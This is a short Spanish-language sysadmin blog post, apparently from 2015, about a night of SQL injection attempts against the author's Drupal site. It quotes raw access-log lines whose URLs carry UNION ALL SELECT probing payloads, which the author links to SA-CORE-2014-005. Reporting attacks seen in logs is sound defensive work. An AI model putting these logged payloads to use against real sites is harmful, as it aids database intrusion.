Bofhers

Hacia tiempo ya … sql injection

19 febrero, 2015
bjone

Llevábamos una temporada bastante calmada, debe ser fiesta en china … o algo así. Pero lo bueno no suele durar, así que anoche otra vez dándole caña a la maquina.


Un par horas haciendo cosas como esta …

128.6.224.107 – – [19/Feb/2015:3:36:14 +0100] «GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200×31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1» 404 18000 «-» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)»
128.6.224.107 – – [19/Feb/2015:3:36:13 +0100] «GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200×31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1» 404 18000 «-» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)»

Por lo menos esta vez el tio se ha preocupado de usar un proxy.

Estuvo un buen rato, cambiándose de ip de vez en cuando …

64.113.32.29 – – [19/Feb/2015:3:36:35 +0100] «GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200×31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1» 404 18000 «-» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)»
64.113.32.29 – – [19/Feb/2015:3:36:34 +0100] «GET /content/test\xc3\x83\xc2\xadtulo-1?device=999999.9%20union%20all%20select%200×31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1» 404 18000 «-» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.5.21022; Media Center PC 6.0; InfoPath.1)»

El parser de drupal para estas cosas, supongo que estarían intentando explotar SA-CORE-2014-005.

El tío estuvo un buen rato dando caña y luego se canso.

En resumen … que o tienes las cosas parcheadas …o estas jodido.